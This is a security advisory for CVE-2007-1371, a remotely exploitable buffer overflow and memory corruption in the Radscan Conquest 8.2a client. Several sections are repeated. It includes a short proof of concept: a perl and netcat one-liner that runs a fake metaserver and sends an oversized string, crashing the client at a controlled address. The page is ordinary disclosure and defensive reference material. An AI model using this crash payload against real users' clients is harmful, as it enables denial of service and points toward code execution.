Radscan Conquest Multiple Remote Vulnerabilities
BID:22855
Info
Radscan Conquest Multiple Remote Vulnerabilities
| Bugtraq ID: | 22855 |
| Class: | Boundary Condition Error |
| CVE: |
CVE-2007-1371 |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 07 2007 12:00AM |
| Updated: | May 12 2015 07:33PM |
| Credit: | Luigi Auriemma is credited with the discovery of these vulnerabilities. |
| Vulnerable: |
RADSCAN Conquest 8.2a |
| Not Vulnerable: |
RADSCAN Conquest 8.2b |
Discussion
Radscan Conquest Multiple Remote Vulnerabilities
Conquest is prone to multiple remotely exploitable vulnerabilities, including a stack-based buffer-overflow vulnerability and a memory-corruption vulnerability.
An attacker can exploit these issues to execute arbitrary code within the context of the affected application or cause the affected application to crash, denying service to legitimate users.
These issues affect version 8.2a; prior versions may also be affected.
Conquest is prone to multiple remotely exploitable vulnerabilities, including a stack-based buffer-overflow vulnerability and a memory-corruption vulnerability.
An attacker can exploit these issues to execute arbitrary code within the context of the affected application or cause the affected application to crash, denying service to legitimate users.
These issues affect version 8.2a; prior versions may also be affected.
Exploit / POC
Radscan Conquest Multiple Remote Vulnerabilities
The following proof of concept is available:
1. Launch a fake metaserver that sends more than 1024 chars:
perl -e 'print "a"x1200' | nc -l -p 1700 -v -v -n
2. Launch the client, specifying the alternate metaserver:
conquest -m -M 127.0.0.1
3. Interrupt the fake metaserver: conquest should have been crashed
trying to executing the code at offset 0x61616161
The following proof of concept is available:
1. Launch a fake metaserver that sends more than 1024 chars:
perl -e 'print "a"x1200' | nc -l -p 1700 -v -v -n
2. Launch the client, specifying the alternate metaserver:
conquest -m -M 127.0.0.1
3. Interrupt the fake metaserver: conquest should have been crashed
trying to executing the code at offset 0x61616161
Solution / Fix
Radscan Conquest Multiple Remote Vulnerabilities
Solution:
To address this issue, the vendor released an update through the SVN repository. Please see the references for more information.
Solution:
To address this issue, the vendor released an update through the SVN repository. Please see the references for more information.
References
Radscan Conquest Multiple Remote Vulnerabilities
References:
References:
- [conquest] Re: security bugs in conquest (Jon Trulson)
- Conquest Homepage (RADSCAN)
- Buffer-overflow in Conquest client 8.2a (svn 691) (Luigi Auriemma)